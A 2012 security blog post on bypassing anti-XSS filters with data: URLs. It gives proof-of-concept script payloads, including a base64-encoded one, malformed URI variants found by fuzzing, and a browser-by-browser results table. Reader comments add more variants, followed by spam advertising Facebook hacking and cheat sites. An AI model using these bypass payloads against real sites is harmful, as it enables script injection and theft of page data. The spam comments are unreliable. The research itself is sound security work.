Friday, April 6, 2012

Fun with data: URLs

Data URLs, especially in their base64 encoding can often be used for anti XSS filter bypasses. This gets even more important in Firefox and Opera, where newly opened documents retain access to opening page. So attacker can trigger XSS with only this semi-innocent-link:
<a target=_blank href="data:text/html,<script>alert(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a>
or even use the base64 encoding of the URL:
data:text/html;base64,PHNjcmlwdD5hbGVydChvcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrMTApPC9zY3JpcHQ+
Chrome will block the access to originating page, so that attacker has limited options:

But what if particular XSS filter knows about data: URIs and tries to reject them? We bypass, of course :) I've been fuzzing data: URIs syntax recently and I just thought you might find below examples interesting:
data:text/html;base64wakemeupbeforeyougogo,[content] // FF, Safari
data:text/html:;base64,[content]
data:text/html:[plenty-of-whitespace];base64,[content]
data:text/html;base64,,[content] // Opera


Here are full fuzz results for vector:
data:text,html;<before>base64<after>,[base64content]

BrowserBefore (ASCII)After (ASCII)
Firefox 11 9,10,13,59 anything
Safari 5.1 9,10,13,59 anything
Chrome 18 9,10,13,32,59 9,10,13,32,59
Opera 11.6 9,10,13,32,59 9,10,13,32,44,59

Not a ground-breaking result, but it may come in handy one day for you, like it did for me.

6 comments:

Jackmasa said...

data:_,alert(/i/)//firefox
data:text/html;base64,<<<<<<<>>>>>>>>> //opera

marsleisure said...

Hi dear! Wish you are doing
excellent, well awesome information and facts. I must say...really demonstrated
& deserving to study.

http://www.marsleisure.com

gardendecors lebanon said...

Hey! Cool Information, many thanks
for sharing this valuable knowledge. I really like it.
http://www.gardendecors.net

Malik Gupta said...

I am reviewing Adblock Plus for possible attack points nevertheless and already added frame busting code to HTML pages - just in case. Hack Facebook

Joana Kane said...

http://www.fbpiraterfr.com/
http://gadgetspeaks.com/
http://aadhaarcarduid.org/
http://cheatjunction.com/hay-day-diamond-hack-cheats/

jac davic said...

Lá cây lược vàng chữa trị bệnh gì?Cây lược vàng được biết có xuất xứ từ Nam Mỹ, cây còn có tên khoa học là Callisia fragrans thuộc họ Thài Lài. Theo một số loại cây dân gian, cây lược vàng có nhiều tác dụng trong việc điều trị bệnh
Tác dụng làm đẹp của bột trà xanhHôm nay, chúng tôi sẽ gởi đến các bạn những tác dụng làm đẹp của bột trà xanh mà có lẻ các bạn chưa biết đến. Cùng xem nào!
Tác dụng của quả na với bà bầuCây chó đẻ là một loại cây đã quá quen thuộc với đời sống thường ngày của người dân Việt Nam.
Cây chó đẻ có tác dụng chữa bệnh gì?Cây chó đẻ là bài thuốc dân gian dùng để chữa nhiều bệnh vô cùng hiệu quả.
Cây chó đẻ răng cưa trị bệnh gì?Cây chó đẻ răng cưa có lẻ không có gì xa lạ với bất kì ai nữa, bởi cây rất đặc biệt, khi chúng ta xờ vào cây lá sẽ khép lại
Uống cây chó đẻ nhiều có hại gì không?Việc trồng cây cảnh trong nhà không chỉ giúp ngôi nhà trở nên trong sáng, tạo không gian đẹp đẽ hơn, mà trồng cây còn có ý nghĩa liên quan đến hạnh phúc, phát tài phát lộc cho gia đình.
Ý nghĩa của cây phát tài trong phong thủyBạn nên trồng phát tài ở phía Đông hoặc Đông Nam ngôi nhà – khu vực đại diện cho Mộc và là nơi có ánh sáng thích hợp cho cây.
Cây mật gấu chữa trị bệnh gì?Hôm nay chúng tôi sẽ giới thiệu đến các bạn bài viết về loại cây mật gấu, cũng như tác dụng mà cây mật gấu mang lại.
Lá cây mật gấu có tác dụng gì?Cây mật gấu hay còn gọi là cây hoàng liên ô rô hay cây mã rồ, cây mật gấu được trồng mọi miền núi vì thế rất dễ kiếm
Công thức làm kem trộn trắng da toàn thânVới phương pháp làm trắng da tự nhiên này, bạn sẽ không còn lo ngại làn da đen xỉn màu nữa, đồng thời đảm bảo an toàn cho da.
Cách làm kem trộn trắng da toàn thânCách thực hiện: Chuẩn bị ½ chén cám gạo, ½ quả chanh và 4 thìa sữa tươi không đường.